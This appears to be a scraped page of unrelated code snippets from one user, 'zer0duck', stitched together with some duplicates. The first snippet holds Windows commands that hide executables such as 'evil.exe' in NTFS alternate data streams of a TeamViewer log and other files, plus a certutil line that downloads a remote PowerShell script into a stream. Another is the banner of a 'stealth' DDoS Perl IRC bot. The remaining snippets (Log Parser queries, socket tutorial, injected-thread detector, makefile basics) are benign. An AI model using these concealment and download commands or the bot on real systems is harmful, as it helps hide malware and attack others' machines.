zer0duck

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab

zer0duck

import openai
import boto3
import json
import time
from typing import Dict, List

openai.api_key = '### SET YOUR OPENAPI API KEY HERE ###'
session = boto3.session.Session()
client = session.client('iam')

zer0duck

#!/usr/bin/perl
 
######################################################################################################################
######################################################################################################################
##  DDoS Perl IrcBot v1.0 / 2017 by flood.ro Team       ## [ Help ] ###########################################
##      Stealth MultiFunctional IrcBot writen in Perl          #######################################################
##        Teste on every system with PERL instlled             ##  !u @system                                       ##
##                                                             ##  !u @version                                      ##
##     This is a free program used on your own risk.           ##  !u @channel                                      ##
##        Created for educational purpose only.                ##  !u @flood                                        ##

zer0duck

# Logparser 


###############
# Security Log
###############

# Find Event id
& 'C:\Program Files (x86)\Log Parser 2.2\LogParser.exe' -stats:OFF -i:EVT "SELECT * FROM 'Security.evtx' WHERE EventID = '5038'"

zer0duck

# Logparser 


###############
# Security Log
###############

# Find Event id
& 'C:\Program Files (x86)\Log Parser 2.2\LogParser.exe' -stats:OFF -i:EVT "SELECT * FROM 'Security.evtx' WHERE EventID = '5038'"

zer0duck

Python Socket 编程详细介绍

Python 提供了两个基本的 socket 模块：

• Socket 它提供了标准的BSD Socket API。
• SocketServer 它提供了服务器重心，可以简化网络服务器的开发。

下面讲解下 Socket模块功能。

Socket 类型

zer0duck

#!/usr/bin/env python

import socket
import os
import struct

if getattr(socket, "NETLINK_CONNECTOR", None) is None:
    socket.NETLINK_CONNECTOR = 11

CN_IDX_PROC = 1

zer0duck

#!/usr/bin/env python

import socket
import os
import struct

if getattr(socket, "NETLINK_CONNECTOR", None) is None:
    socket.NETLINK_CONNECTOR = 11

CN_IDX_PROC = 1

zer0duck

function Get-InjectedThread
{
    <# 
    
    .SYNOPSIS 
    
    Looks for threads that were created as a result of code injection.
    
    .DESCRIPTION
    

zer0duck

# Hello, and welcome to makefile basics.
#
# You will learn why `make` is so great, and why, despite its "weird" syntax,
# it is actually a highly expressive, efficient, and powerful way to build
# programs.
#
# Once you're done here, go to
# http://www.gnu.org/software/make/manual/make.html
# to learn SOOOO much more.